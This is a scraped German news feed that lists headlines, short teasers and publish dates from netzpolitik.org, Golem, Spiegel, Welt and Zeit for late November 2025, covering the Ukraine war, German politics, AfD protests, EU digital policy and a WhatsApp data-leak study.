Wenn es nach den EU-Staatschef:innen geht, heißt "digitale Souveränität", auf Technologie aus Europa zu setzen, so der Tenor auf dem Digitalgipfel Mitte November. Um sich von Big Tech unabhängig zu machen, ist aber weniger relevant, wo Lösungen herkommen, sondern vielmehr dass sie Open Source sind, entgegnen zivilgesellschaftliche Akteure.

Article link

Date of publish: Thu, 27 Nov 2025 16:21:48 +0000

Interview zu WhatsApp: Von Emojis zum Mega-Datenleck

Auf einem Smartphone Bildschirm sind Apps zu sehen. Ein Finger schwebt über dem WhatsApp-Symbol.
Beinah die Hälfte der Weltbevölkerung hat ein WhatsApp-Profil. Das kann ziemlich verräterisch sein. – Alle Rechte vorbehalten IMAGO / NurPhoto
Forscher*innen aus Österreich entdeckten die freie Verfügbarkeit von 3,5 Milliarden WhatsApp-Profilen. Wie es zu dem spektakulären Fund kam und wie Meta auf ihre Warnung reagierte, erzählt Aljosha Judmayer, Co-Autor der Studie zum Datenleck.

Article link

Date of publish: Thu, 27 Nov 2025 15:13:26 +0000

Golem.de

Marvel: Die Spider-Man-Serie, die Stan Lee hasste

Mit der ersten Realversion von Spider-Man war sein Schöpfer überhaupt nicht zufrieden. (Spider-Man, Film)

Article link

Date of publish: Thu, 27 Nov 2025 18:37:02 +0100

Ein Deutscher soll zum Mond fliegen: Ein Deutscher soll zum Mond fliegen

Auf der Ministerratstagung der Esa in Bremen wurden die ersten drei europäischen Nationen verkündet, deren Astronauten zum Mond fliegen dürfen. (Mond, Raumfahrt)

Article link

Date of publish: Thu, 27 Nov 2025 18:13:01 +0100

Simulation zeigt Auswirkungen: KI könnte 12 Prozent des US-Arbeitsmarkts ersetzen

Eine Simulation des MIT zeigt, dass nicht nur technologische Berufe und Ballungsgebiete von Arbeitsplatzverlusten durch KI betroffen wären. (Arbeit, Studien)

Article link

Date of publish: Thu, 27 Nov 2025 17:42:01 +0100

DER SPIEGEL - Schlagzeilen – Tops

Ukrainekrieg: Putin knüpft Waffenruhe an ukrainischen Rückzug – Kyjiw lehnt Forderung strikt ab

Putin will den Rückzug der Ukraine aus den von Moskau beanspruchten Gebieten und droht mit militärischer Gewalt. Kyjiw weist die Forderungen entschieden zurück: Selenskyj werde kein Territorium »wegverhandeln«.

Article link

Date of publish: Thu, 27 Nov 2025 22:26:00 +0100

Stuttgart 21: Wer hat die nächste Verspätung verbockt?

Die Bahn schiebt die Eröffnung von Stuttgart 21 erneut in die Zukunft – und die Verantwortung auf den japanischen Konzern Hitachi. Doch so einfach ist es nicht.

Article link

Date of publish: Thu, 27 Nov 2025 19:30:00 +0100

Friedrich Merz verbittet sich Ermahnungen der USA zur Migrationspolitik

Deutschland entscheidet selbst über die Linie in der Migrationspolitik, stellt der Kanzler klar. Er reagiert damit auf eine Weisung der USA, westliche Regierungen zu härteren Maßnahmen zu drängen.

Article link

Date of publish: Thu, 27 Nov 2025 21:04:00 +0100

Bundestagswahl: BSW-Einspruch scheitert laut Berichten wohl im Wahlprüfungsausschuss

Dem Bündnis Sahra Wagenknecht steht wohl eine Niederlage bevor: Der Bundestagsausschuss will die Einsprüche zur Wahl offenbar ablehnen, es geht um die Neuauszählung der Stimmen. Zieht Wagenknecht nun vor Gericht?

Article link

Date of publish: Thu, 27 Nov 2025 21:38:00 +0100

Bundeswehr: Jetzt lahmt ein weiteres Digital-Projekt

Erst hakte es beim Digitalfunk, jetzt gibt es Probleme bei einem wichtigen Softwareprojekt der Bundeswehr. Betroffen sind IT-Anwendungen für Verwaltung, Material und Logistik.

Article link

Date of publish: Thu, 27 Nov 2025 18:52:00 +0100

Bochum: Anwalt widerspricht Notwehr-Darstellung im Fall der 12-Jährigen

Ein zwölfjähriges Mädchen wurde vor zehn Tagen durch eine Polizeikugel schwerst verletzt. Am Freitag ist der Vorfall Thema im Innenausschuss im Landtag von NRW. Ein Anwalt widerspricht der Notwehr-Darstellung der Behörden.

Article link

Date of publish: Thu, 27 Nov 2025 21:20:00 +0100

Feuer in Hongkong: Der schlimme Verdacht von Tai Po

In Hongkong beginnt nach dem Häuserbrand mit Dutzenden Toten die Spurensuche. Die Regierung ermittelt wegen Korruption. Einheimische berichten von ignorierten Warnungen und greifen nun zur Selbsthilfe.

Article link

Date of publish: Thu, 27 Nov 2025 17:37:00 +0100

Westjordanland: Israelische Sicherheitskräfte erschießen laut Medienberichten zwei Palästinenser aus nächster Nähe

Im Westjordanland sollen zwei Männer erschossen worden sein, nachdem sie sich ergeben haben. Das berichten israelische und palästinensische Medien. Das israelische Militär kündigte eine Untersuchung an.

Article link

Date of publish: Thu, 27 Nov 2025 20:23:00 +0100

Donald Trumps Migrationspolitik: Sprecherin Leavitt von Trumps Kurs betroffen

Karoline Leavitt steht eisern zu ihrem Chef und seiner harten Migrationspolitik. Nun sind ihr Bruder, dessen Ex-Partnerin und ihr Neffe betroffen. Die Familie sammelt Spendengelder und Leavitt schweigt.

Article link

Date of publish: Thu, 27 Nov 2025 21:07:00 +0100

Donald Trump und die Zölle: Europäer wehren sich gegen Erpressung durch USA

Die strengen Digitalregeln in der EU sind den USA ein Dorn im Auge. Der Streit schaukelt sich immer weiter hoch. Die Europäer wollen sich gegen die Erpressungsversuche von US-Handelsminister Howard Lutnick wehren.

Article link

Date of publish: Thu, 27 Nov 2025 21:18:00 +0100

Österreich: Betagte Nonnen könnten im besetzten Kloster bleiben – mit einer Bedingung

Drei Ordensfrauen hatten ihr früheres Kloster eigenmächtig wieder bezogen und damit Protest ausgelöst. Nun wird ihnen ein Bleiben in Aussicht gestellt – allerdings unter Auflage. Zehntausende unterstützen die Nonnen inzwischen online.

Article link

Date of publish: Thu, 27 Nov 2025 21:45:00 +0100

Evolution: Veränderung der Sonneneinstrahlung könnte Entwicklung angetrieben haben

Vor rund 540 Millionen Jahren brach ein gewaltiger Evolutionsschub über die Erde herein. Lebewesen entwickelten Skelette und lernten zu schwimmen. Forscher wollen nun den Auslöser gefunden haben.

Article link

Date of publish: Thu, 27 Nov 2025 15:57:00 +0100

Hunde: Was macht die Genies so schlau? Studie liefert Antworten

Manche Hunde können lediglich anhand von Namen Hunderte Objekte auseinanderhalten. Was unterscheidet sie von ihren Artgenossen? Forscherinnen liefern nun Antworten.

Article link

Date of publish: Thu, 27 Nov 2025 17:23:00 +0100

Elton John ringt mit Sehverlust – und setzt auf Wissenschaft und KI

Musiker Elton John kämpft seit einer beidseitigen Augeninfektion mit massiven Einschränkungen, doch erste Therapien zeigen Wirkung. Während sein Umfeld ihn stützt, setzt der 78-Jährige auf Fortschritte in der Medizin und KI.

Article link

Date of publish: Thu, 27 Nov 2025 20:34:00 +0100

IU Internationale Hochschule: Die Schattenseiten der größten deutschen Hochschule

Kein Abitur nötig, viele Fächer ohne NC: Die IU verspricht Zugang zum Studium für fast alle. In wenigen Jahren hat sich die Studierendenzahl verdreizehnfacht. Kann eine Hochschule seriös so schnell wachsen?

Article link

Date of publish: Wed, 26 Nov 2025 15:39:00 +0100

Michelle Obama: »The Look« – Kleidung und Selbstbestimmung im Weißen Haus

Anlass, Publikum, Botschaft: Die Garderobe einer First Lady gehört zum politischen Lagebild. Warum das besonders für die erste Schwarze im Amt gilt, zeigt Michelle Obama in »The Look«.

Article link

Date of publish: Sat, 22 Nov 2025 07:23:00 +0100

Messerschärfer von Tormek, F. Dick, Horl, Graef im Test: So werden Ihre Messer wieder scharf

Unser Autor wähnte sich nach einigen Tests schon mit den perfekten Messerschleifern für seine Küche ausgestattet. Jetzt hat er ein neues Modell ausprobiert und einen Gamechanger für Hobbyköche entdeckt.

Article link

Date of publish: Sun, 16 Nov 2025 07:54:00 +0100

Handballerin Alina Grijseels im Kinder-Interview: »Wir können bei der WM für eine Überraschung sorgen«

Alina Grijseels ist deutsche Handball-Nationalspielerin. Charlotte und Liv, beide 13 Jahre alt, sprachen mit ihr über Rituale, Sieben-Meter-Würfe und die anstehende Weltmeisterschaft.

Article link

Date of publish: Wed, 26 Nov 2025 13:18:00 +0100

Nachrichten - WELT

Grüne Jugend kündigt Linksruck an und fordert mehr Mut von der Parteispitze

Die neue Führung der Grünen Jugend geht mit ihrer Parteispitze hart ins Gericht. Statt sich eine Tür zur Macht offenzuhalten, solle die Partei mehr Mut und Angriffslust beweisen, fordert der neue Co-Chef Luis Bobga.

Article link

Date of publish: Thu, 27 Nov 2025 23:00:52 GMT

Massenproteste zu AfD-Jugendkongress erwartet – Selbst die Bundeswehr warnt ihre Soldaten vor Gewalt

Angst vor Krawallen und juristisches Tauziehen - in Gießen wächst vor dem Gründungstreffen der AfD-Jugend und den erwarteten Gegenprotesten die Anspannung. Selbst die Bundeswehr warnt ihre Soldaten wegen Anti-AfD-Demos vor Angriffen.

Article link

Date of publish: Thu, 27 Nov 2025 22:26:28 GMT

USA prüfen Green Cards aller Ausländer aus „problematischen Ländern“

Ein Mann schießt nahe dem Weißen Haus auf zwei Nationalgardisten und verletzt diese lebensgefährlich. Das hat nun Konsequenzen für Inhaber der Green Card. Die Behörden wollen die Aufenthaltstitel aller Ausländer aus 19 Ländern überprüfen.

Article link

Date of publish: Thu, 27 Nov 2025 22:05:32 GMT

Neuauszählung der Bundestagswahl fällt wohl aus – „Der Weg für uns nach Karlsruhe ist endlich frei“

Rund 9500 Stimmen fehlten dem BSW zum Einzug in den Bundestag. Seit Monaten kämpft die Partei um eine Neuauszählung der Stimmen der Bundestagswahl. Eine Vorprüfung für den Bundestag fällt für die Partei jedoch nicht günstig aus. Die Parteichefin reagiert verärgert.

Article link

Date of publish: Thu, 27 Nov 2025 21:28:26 GMT

Stuttgart feiert Kantersieg – Freiburg zittert sich zu einem Punkt – Mainz enttäuscht in Rumänien

Der SC Freiburg kommt in Tschechien nicht über ein Unentschieden hinaus. Für Mainz 05 ist die perfekte Bilanz in der Conference League ist futsch. Der VfB Stuttgart gibt sich gegen niederländischen Pokalsieger keine Blöße.

Article link

Date of publish: Thu, 27 Nov 2025 20:50:18 GMT

„Schlimmer als die Pandemie, die wir erlebt haben“ – Institut warnt vor bedrohlicher Virusmutation

Es war eines der ersten Labore in Europa, das Tests zum Nachweis von Covid-19 entwickelte. Jetzt veröffentlicht das Institut Pasteur aus Frankreich vor einer Mutation des Vogelgrippe-Virus. Die Folgen wären schwerwiegend.

Article link

Date of publish: Thu, 27 Nov 2025 20:34:49 GMT

„Nächste Woche stehen für mich wichtige Verhandlungen an“ – Selenskyj deutet Spitzentreffen an

Der ukrainische Präsident Selenskyj kündigte für kommende Woche „wichtige Verhandlungen“ an. Unterdessen droht Kreml-Chef Putin mit einem verstärkten Vormarsch, sollten sich die ukrainischen Truppen nicht aus Schlüsselgebieten zurückziehen. Mehr im Liveticker.

Article link

Date of publish: Thu, 27 Nov 2025 19:48:00 GMT

„Da brauchen wir keine Ermahnungen“ – Merz kontert US-Einmischung bei Migrationspolitik

Die US-Regierung weist Diplomaten an, in Europa für eine restriktivere Einwanderungspolitik zu werben. Bundeskanzler Merz weist die Intervention der Vereinigten Staaten zurück. Europa werde aus eigener Kraft eine gemeinsame Asyl- und Einwanderungspolitik formulieren.

Article link

Date of publish: Thu, 27 Nov 2025 19:47:50 GMT

„Gut, dann fixieren wir das“ – Putin stellt radikale Ukraine-Bedingung und macht Europa ein Angebot

Die USA planen mit Russland, die Chancen auf ein Kriegsende auszuloten. Kremlchef Putin zeigt sich unnachgiebig. Ohne russische Kontrolle über den Donbass werde eine Einigung ausbleiben. Auf einer bemerkenswerten Pressekonferenz machte er Europa ein Angebot.

Article link

Date of publish: Thu, 27 Nov 2025 19:35:38 GMT

„Die Amerikaner haben nur gesagt – Europäer dürfen zum Mond fliegen, aber nicht landen“

Wer wird der erste deutsche ESA-Astronaut auf einer Mondmission? Ulrich Walter, Professor für Raumfahrttechnik, erklärt die Auswahlkriterien und die Rolle der USA: „Der neue NASA-Chef will nur noch drei Flüge zum Mond genehmigen.“

Article link

Date of publish: Thu, 27 Nov 2025 19:28:31 GMT

„Wenn drei Mitglieder ausgetreten sind, ist das ein halbes Promille“

Die Familienunternehmer wollen die Brandmauer zur AfD einreißen und luden deshalb Politiker zu einer Veranstaltung ein. Die Konsequenz ist, dass Rossmann den Vertrag mit dem Verband kündigte. „Das ist wie Sauna im Sommer“, sagt WELT-Kolumnist Henryk M. Broder.

Article link

Date of publish: Thu, 27 Nov 2025 19:04:18 GMT

„Es ist jetzt wirklich zu einem Stück schmutziger Machtpolitik geworden“

Der Rentenstreit innerhalb der Koalition sorgt für scheinbar unüberwindbare Spannungen. WELT-Kolumnist Hans-Ulrich Jörges würde die Rentenkommission mehr involvieren. „Die Kommission kann Vorschläge machen, wie das alles finanziert wird.“

Article link

Date of publish: Thu, 27 Nov 2025 18:52:27 GMT

„Deutschland kann nicht einmal die eigene Landesverteidigung sicherstellen“

Markus Frohnmaier, außenpolitischer Sprecher der AfD, fordert mehr Realpolitik im Ukraine-Krieg. Er sieht die Überlegung über den Einsatz des eingefrorenen russischen Vermögens kritisch: „Deutschland kann nicht Recht brechen.“

Article link

Date of publish: Thu, 27 Nov 2025 18:44:19 GMT

„Besorgniserregende Entwicklung“ – Berlin erlebt Flut bei Einbürgerungsklagen

Die Berliner Verwaltung ächzt unter der großen Zahl an Anträgen auf Einbürgerung. Alleine im laufenden Jahr sind laut Angaben des RBB deshalb 2000 Klagen beim Verwaltungsgericht eingegangen. Innensenatorin Spranger kündigt Hilfe für das Landesamt an.

Article link

Date of publish: Thu, 27 Nov 2025 18:22:01 GMT

„Manuel Neuer war nicht alleine Schuld an der Pleite gegen Arsenal“

Jens Lehmann analysiert das Champions-League-Spiel des FC Bayern gegen Arsenal. Er nimmt Manuel Neuers Leistung in Schutz und betont die Bedeutung des Konkurrenzkampfs im Tor der Nationalmannschaft.

Article link

Date of publish: Thu, 27 Nov 2025 18:15:14 GMT

Wegen Treffen mit Rechtsextremist – NRW-AfD entzieht Ukraine-Kämpfer erneut Mitgliedsrechte

Eskalation im Fall des Ukraine-Kämpfers Schramm: Der Vorstand der NRW-AfD entzieht ihm erneut die Mitgliedsrechte – nur zwei Tage nach der Rückgabe durch das Schiedsgericht. Schramm werden Verbindungen zu einem Ex-NPD-Spitzenfunktionär vorgeworfen. Er spricht von „Cancel Culture“ in der AfD.

Article link

Date of publish: Thu, 27 Nov 2025 18:14:48 GMT

„Politisch ist das eine Bankrotterklärung unserer Migrationspolitik“

Das Berliner Verwaltungsgericht nennt die Auflösung des Palästina-Kongresses aus 2024 rechtswidrig. Medienwissenschaftler Norbert Bolz sieht das Urteil zwiegespalten: „Juristisch sicherlich korrekt, jedoch muss man sehen, welche politische Signalwirkung das hat“

Article link

Date of publish: Thu, 27 Nov 2025 18:08:08 GMT

„Von langer Hand geplant“ – SPD wittert Verschwörung durch Grünen-Minister

Skandalöse Vorgänge: In der Richterposten-Affäre um den grünen NRW-Justizminister Limbach bringt ein Untersuchungsausschuss dubiose Aktivitäten ans Licht. Die Opposition spricht von politischer Einflussnahme, Schwarz-Grün hingegen von „Bestenauslese“.

Article link

Date of publish: Thu, 27 Nov 2025 18:04:57 GMT

„Und dann seid ihr die Nächsten“ – Putin-Kritiker rastet auf der Bühne aus

Bewegende Worte des ehemaligen Schachweltmeisters: Auf einer Podiumsdiskussion zerpflückt Kreml-Kritiker Garri Kasparow den 28-Punkte-Friedensplan. Dieser sei das „Beste“, was Putin sich erhoffen könne. Zudem existiere die Nato in seinen Augen nicht. Sie sei ein „Fake“.

Article link

Date of publish: Thu, 27 Nov 2025 17:56:33 GMT

„Entweder will man Geld verdienen oder man will in die Politik“ – Söder geht auf Distanz zu Weimer

Der Kulturstaatsminister muss sich weiter heftige Vorwürfe anhören. CSU-Chef Markus Söder zeigt sich distanziert: Politik und Geldverdienen schließen sich aus. Man müsse sich entscheiden.

Article link

Date of publish: Thu, 27 Nov 2025 17:31:59 GMT

„Wir hätten ja nichts davon, wenn wir sie jahrelang einsperren“, sagt der Staatsanwalt

Eine junge Serbin ergaunert sich mit angeblich übernatürlichen Kräften gewaltige Summen. So auch von Stefan M., dem sie die Befreiung von einem „Fluch“ verspricht. In Haft muss die „Heilerin“ aber nicht – die Anklage nennt einen bemerkenswerten Grund.

Article link

Date of publish: Thu, 27 Nov 2025 17:28:36 GMT

Projekt „Arminius“ – das steckt hinter dem historischen Panzer-Plan der Bundeswehr

Ein Blick in die Bilanz der deutschen Rüstungsfirma Artec lässt nicht einmal erahnen, welch gigantisch großer Auftrag auf das Gemeinschaftsunternehmen von Rheinmetall und KNDS wartet. Der geplante Deal mit der Bundeswehr hätte historische Dimensionen.

Article link

Date of publish: Thu, 27 Nov 2025 17:09:32 GMT

„Die nächste Runde des Krieges mit dem Iran wird noch größer und gefährlicher“

Nach dem Zwölf-Tage-Krieg Israels und der USA gegen den Iran ist das Streben der Mullahs nach der Atombombe ungebrochen. Der Experte Raz Zimmt sagt: Bei einem neuen Krieg wird Israel einen Schritt unternehmen, der schwerwiegende Folgen haben könnte.

Article link

Date of publish: Thu, 27 Nov 2025 17:07:40 GMT

WELT AM SONNTAG sucht das Sportfoto des Jahres 2025

Zum 27. Mal wird der Sven-Simon-Preis für das beste Sportfoto des Jahres vergeben – die höchstdotierte Auszeichnung in diesem Bereich. Den Sieger wählt eine prominente Jury. Ob Profi oder Amateur: Nun können die Bilder eingereicht werden.

Article link

Date of publish: Thu, 27 Nov 2025 16:51:40 GMT

Renten, EU-Austritt, keine Zuwanderung – Das bedeutet das AfD-Programm für die Wirtschaft

Der Verband „Die Familienunternehmer“ hat mit seiner Öffnung für AfD-Abgeordnete eine Diskussion ausgelöst. Viele Unternehmer distanzierten sich, auch mit dem Hinweis auf die schädliche Wirtschaftspolitik der Partei. Wie diese aussieht, hat AfD-Chefin Weidel im Bundestag gezeigt.

Article link

Date of publish: Thu, 27 Nov 2025 16:47:31 GMT

Erstmals soll ein deutscher Astronaut zum Mond

Die ESA plant, im Rahmen des Artemis-Programms erstmals einen deutschen Astronauten zum Mond zu schicken – Favoriten sind Alexander Gerst und Matthias Maurer.

Article link

Date of publish: Thu, 27 Nov 2025 16:36:40 GMT

„Müssen schauen, ob es Terror war oder nur ein durchgeknallter Irrer“

Nach dem Anschlag auf zwei Nationalgardisten in Washington ermittelt das FBI wegen Terrorverdachts. Der mutmaßliche Täter steht im Fokus politischer Debatten um Bidens Aufnahmeprogramm. „Die politische Dimension ist enorm“, sagt US-Korrespondent Michael Wüllenweber.

Article link

Date of publish: Thu, 27 Nov 2025 16:29:00 GMT

Schüsse auf US-Nationalgardisten – Terrorverdächtiger arbeitete selbst für die CIA

Nachdem zwei Soldaten der US-Nationalgarde durch einen Schützen schwer verletzt worden sind, kann CIA-Direktor Ratcliffe erste Informationen über den Täter bekannt geben. Bis zur kurz nach der Evakuierung der US-Truppen aus Afghanistan 2021 habe dieser mit der CIA zusammengearbeitet.

Article link

Date of publish: Thu, 27 Nov 2025 16:14:43 GMT

„Diese Pädokriminellen sind weiterhin aktiv“

Die pädokriminelle Gruppe „764“ stehen im Verdacht, mehr Suizide und Gewalttaten verursacht zu haben als bisher bekannt – Ermittler gehen von weit mehr als den bisher vermuteten sechs Opfern aus. „Es ist ein sehr umfangreiches Netzwerk“, erklärt WELT-Reporter Max Hermes.

Article link

Date of publish: Thu, 27 Nov 2025 16:12:35 GMT

„Ich stell mir vor, ich lieg da“ – Der ewige Wunsch nach Würde im Tod

Am besten umfallen und weg? Der Dokumentarfilm „Der Tod ist ein Arschloch“ entlarvt den Selbstbetrug aller, die sich vor dem Sterben fürchten – und zeigt, welche Wege es gibt. Auch wenn man weiß, wie es zu Ende geht.

Article link

Date of publish: Thu, 27 Nov 2025 16:09:55 GMT

Nachrichten: DIE ZEIT Newsfeed

Krieg gegen die Ukraine: Wolodymyr Selenskyj kündigt Gespräche mit US-Delegation an

Vertreter der Ukraine und der USA wollen sich laut Selenskyj zeitnah zu Gesprächen treffen. Sie planen, den in Genf besprochenen Entwurf weiterzuentwickeln. Das Liveblog

Article link

Date of publish: Thu, 27 Nov 2025 23:17:44 -0000

Guinea-Bissau: Guinea-Bissaus Präsident nach mutmaßlichem Militärputsch ausgeflogen

Umaro Sissoco Embaló hat nach einem mutmaßlichen Putsch das Land verlassen. Die Staatengemeinschaft Ecowas und die Afrikanischen Union verurteilen die Machtübernahme.

Article link

Date of publish: Thu, 27 Nov 2025 23:10:08 -0000

Schüsse auf Nationalgardisten in Washington, D. C.: USA wollen afghanische Flüchtlinge aus Amtszeit von Joe Biden prüfen

Erst im April bekam der Tatverdächtige wohl Asyl, Donald Trump will dennoch Einreisen von Afghanen in der Vorgängerregierung prüfen. Auch Green Cards werden neu bewertet.

Article link

Date of publish: Thu, 27 Nov 2025 22:37:41 -0000

Europa League, 5. Spieltag: Stuttgart gewinnt gegen Deventer, Freiburg spielt in Pilsen Remis

Die Go Ahead Eagles verlieren gegen den VfB Stuttgart deutlich. Die Freiburger bleiben auch im fünften Spiel der laufenden Europa-League-Saison ungeschlagen.

Article link

Date of publish: Thu, 27 Nov 2025 22:03:32 -0000

Hongkong: Zahl der Toten nach Brand in Hongkonger Wohnanlage steigt auf 83

Bei Hongkongs tödlichstem Brand seit Jahrzehnten haben sich Flammen über Bambusgerüste auf mehrere Hochhäuser ausgebreitet. Die Polizei meldet drei Festnahmen.

Article link

Date of publish: Thu, 27 Nov 2025 21:26:15 -0000

Was jetzt? – Die Woche: US-Drogenkrieg gegen Venezuela – alles nur ein Vorwand?

Die USA sprechen von einem Krieg gegen Drogen – doch sie greifen ein Land an, das im globalen Drogenschmuggel nur eine Nebenrolle spielt, in "Was jetzt? – Die Woche".

Article link

Date of publish: Thu, 27 Nov 2025 20:01:03 -0000

Krieg in Gaza: Mehrere Staaten fordern Schutz von Palästinensern gegen Siedlergewalt

Deutschland, Frankreich, Italien und Großbritannien mahnen Israel, gegen die Siedlergewalt vorzugehen. Die Zahl der Attacken sei so hoch wie nie zuvor. Das Liveblog

Article link

Date of publish: Thu, 27 Nov 2025 19:55:20 -0000

Anti-Corruption Foundation: Russlands Justiz stuft Stiftung von Nawalny als "terroristisch" ein

Das Oberste Gericht in Moskau hat Nawalnys Anti-Corruption Foundation verboten. Die Richter werfen der Organisation "zersetzende Tätigkeiten" und Terrorunterstützung vor.

Article link

Date of publish: Thu, 27 Nov 2025 19:40:05 -0000

KI-Begleiter: Kann man sich in eine KI verlieben?

KI‑Begleiter hören zu, trösten, flirten. Für manche Menschen ersetzen sie bereits Freundschaften oder Beziehungen. Eine Chance gegen die Einsamkeit?

Article link

Date of publish: Thu, 27 Nov 2025 19:21:41 -0000

Schüsse auf Nationalgardisten: Verdächtiger Schütze arbeitete in Afghanistan mit CIA zusammen

Der mutmaßliche Schütze, der Nationalgardisten in Washington angegriffen haben soll, arbeitete im Ausland zuvor mit der CIA zusammen. So konnte er in die USA einreisen.

Article link

Date of publish: Thu, 27 Nov 2025 18:50:04 -0000

Russischer Angriffskrieg: Wladimir Putin fordert Rückzug der Ukraine als Bedingung für Kampfende

Russlands Präsident sieht ein Kampfende erst möglich, wenn ukrainische Truppen bestimmte Gebiete verlassen. Andernfalls werde Russland den Rückzug militärisch erzwingen.

Article link

Date of publish: Thu, 27 Nov 2025 18:47:47 -0000

Esa-Ministerratskonferenz: Ein Deutscher fliegt zum Mond? Tolle Schlagzeile!

Raumfahrtministerin Dorothee Bär verkündet News, die keine sind – mit unhaltbarem Datum. Schöne PR. Nur beschloss die Esa-Ministerratskonferenz ganz andere Dinge.

Article link

Date of publish: Thu, 27 Nov 2025 18:28:51 -0000

Rostock: Nach Brand an Rostocker Überseehafen wird wegen Sabotage ermittelt

Im Mai brannte es im Rostocker Überseehafen – für viel Aufmerksamkeit sorgte das nicht. BKA und Verfassungsschutz erwähnten den Fall nun im Kontext hybrider Bedrohungen.

Article link

Date of publish: Thu, 27 Nov 2025 18:17:09 -0000

Europa League: Jetzt live: Go Ahead Eagles – VfB Stuttgart

Fünfter Spieltag in der Europa League: Die Stuttgarter treten in den Niederlanden an. Alle Spiele im Liveticker

Article link

Date of publish: Thu, 27 Nov 2025 17:46:50 -0000

Migration: Friedrich Merz weist Einmischung der USA in Migrationspolitik zurück

Die US-Regierung hat ihre Diplomaten angewiesen, in Europa für eine restriktivere Einwanderungspolitik zu werben. Der Bundeskanzler reagiert mit klarer Ablehnung.

Article link

Date of publish: Thu, 27 Nov 2025 17:46:02 -0000

netzpolitik.org

Proteste gegen AfD-Jugend: Stadt Gießen will Demoverbotszone vor Gericht durchsetzen

Ortsschild mit Gießen und durchgestrichene AfD-Jugend
In Gießen wird es Massenproteste gegen die rechtsradikale AfD-Jugend geben. (Symbolbild) – Alle Rechte vorbehalten imago-giessen-afd-jugend-montage
Der Streit um eine von der Stadt Gießen verfügte Demoverbotszone geht nun in die nächste Instanz, vor den Hessischen Verwaltungsgerichtshof. Die Stadt beharrt darauf, die Proteste weit weg von der AfD-Veranstaltung zu verlegen.

Article link

Date of publish: Thu, 27 Nov 2025 18:51:28 +0000

Digitale Souveränität: Wie die EU Freie Software ausblendet

durch eine Fensterfront sind Emmanuel Macron und Friedrich Merz auf einem Podest bei einer Pressekonferenz zu sehen
Open Source musste beim Digitalgipfel in Berlin draußen bleiben. – Alle Rechte vorbehalten IMAGO/Chris Emil Janßen
Wenn es nach den EU-Staatschef:innen geht, heißt "digitale Souveränität", auf Technologie aus Europa zu setzen, so der Tenor auf dem Digitalgipfel Mitte November. Um sich von Big Tech unabhängig zu machen, ist aber weniger relevant, wo Lösungen herkommen, sondern vielmehr dass sie Open Source sind, entgegnen zivilgesellschaftliche Akteure.

Article link

Date of publish: Thu, 27 Nov 2025 16:21:48 +0000

Interview zu WhatsApp: Von Emojis zum Mega-Datenleck

Auf einem Smartphone Bildschirm sind Apps zu sehen. Ein Finger schwebt über dem WhatsApp-Symbol.
Beinah die Hälfte der Weltbevölkerung hat ein WhatsApp-Profil. Das kann ziemlich verräterisch sein. – Alle Rechte vorbehalten IMAGO / NurPhoto
Forscher*innen aus Österreich entdeckten die freie Verfügbarkeit von 3,5 Milliarden WhatsApp-Profilen. Wie es zu dem spektakulären Fund kam und wie Meta auf ihre Warnung reagierte, erzählt Aljosha Judmayer, Co-Autor der Studie zum Datenleck.

Article link

Date of publish: Thu, 27 Nov 2025 15:13:26 +0000

Lobbyismus: Palantir-Mitarbeiterin saß beim Souveränitätsgipfel mit Macron und Merz am Tisch

Bild eines Konferenztisches mit Personen.
Laura Rudas (in grün-weiß) beim Round Table. Screenshot eines Videos vom Gipfel
Eine hochrangige Palantir-Managerin nahm ausgerechnet am Gipfel zur digitalen Souveränität teil. Palantir gilt als Paradebeispiel für die Gefahren digitaler Abhängigkeiten. Das Bundeskanzleramt wusste offenbar nichts davon.

Article link

Date of publish: Thu, 27 Nov 2025 14:28:33 +0000

Demoverbotszone Gießen: DGB legt Beschwerde gegen Beschluss des Verwaltungsgerichts ein

Große Demonstration gegen Rechtsradikalismus.
Die Gießener sind stabil gegen Rechts. An einer Demo im Februar 2025 nahmen mehr als 10.000 Menschen teil. – Alle Rechte vorbehalten IMAGO / Müller-Stauffenberg
In der juristischen Auseinandersetzung um eine faktische "Demoverbotszone" in Gießen hat das Verwaltungsgericht in einem Fall die Auflagen der Stadt bestätigt. Die möchte den Protest gegen die rechtsradikale AfD-Jugend auf die andere Seite der Stadt verlegen. Doch die Anmelder der Demos wehren sich weiter.

Article link

Date of publish: Thu, 27 Nov 2025 04:00:49 +0000

Datenspende: „Digitaler Omnibus“ könnte Forschung zu Big-Tech erschweren

Eine Reihe von weißen einsen und nullen aufm schwarzen Grund, in der Mitte sind einzige Ziffern rot, sodass ein Herz sichtbar wird.
Wer mit Daten Gutes tun will, könnte es bald schwer haben. – Gemeinfrei-ähnlich freigegeben durch unsplash.com Alexander Sinn
Weil Tech-Konzerne selten Zugang zu ihren Daten gewähren, ist unabhängige Forschung auf Datenspenden angewiesen. Damit könnte es jedoch bald vorbei sein, denn die EU-Kommission will das Datenauskunftsrecht einschränken. Ein offener Brief aus der Wissenschaft warnt vor schwerwiegenden Folgen für die Plattformforschung.

Article link

Date of publish: Wed, 26 Nov 2025 15:43:49 +0000

EU-Rat einigt sich zur Chatkontrolle: Schlimmster Giftzahn gezogen, aber weiterhin gefährlich

Lupe schaut auf Messenger
Knackpunkt der Verhandlungen war die verpflichtende Chatkontrolle. (Symbolbild) – Alle Rechte vorbehalten IMAGO / IlluPics
Nach langer Blockade hat sich der EU-Rat bei der Chatkontrolle geeinigt. Zivilgesellschaftliche Organisationen sind erleichtert, dass die verpflichtende Chatkontrolle vom Tisch ist, warnen aber vor anderen problematischen Teilen im Gesetzentwurf.

Article link

Date of publish: Wed, 26 Nov 2025 10:53:42 +0000

Frontex und Europol: Zwei EU-Agenturen sollen bei der Drohnenabwehr helfen

Ein Schaubild, auf dem eine Drohne, Drohnensteuerungssysteme und kritische Infrastruktur zu sehen sind.
Frontex bereitet sich auf verschiedene Szenarien gegen störende Drohnen vor. Dazu gehört auch deren Abwehr. – Alle Rechte vorbehalten Frontex
Die EU plant neue Strukturen zur Abwehr unbemannter Fluggeräte. Frontex könnte dazu ein erweitertes Mandat erhalten. Europol warnt vor zunehmender Nutzung durch organisierte und staatliche Akteure.

Article link

Date of publish: Wed, 26 Nov 2025 09:42:51 +0000

Demoverbotszone in Gießen: Die Versammlungsfreiheit darf nicht der Polizeitaktik geopfert werden

Schild mit Scheiss-Haufen und Aufschrift "AfD ist keine Alternative"
Schon im Februar dieses Jahres demonstrierten mehr als 10.000 Menschen in Gießen gegen den Rechtsruck. (Archivbild) – Alle Rechte vorbehalten IMAGO / Müller-Stauffenberg
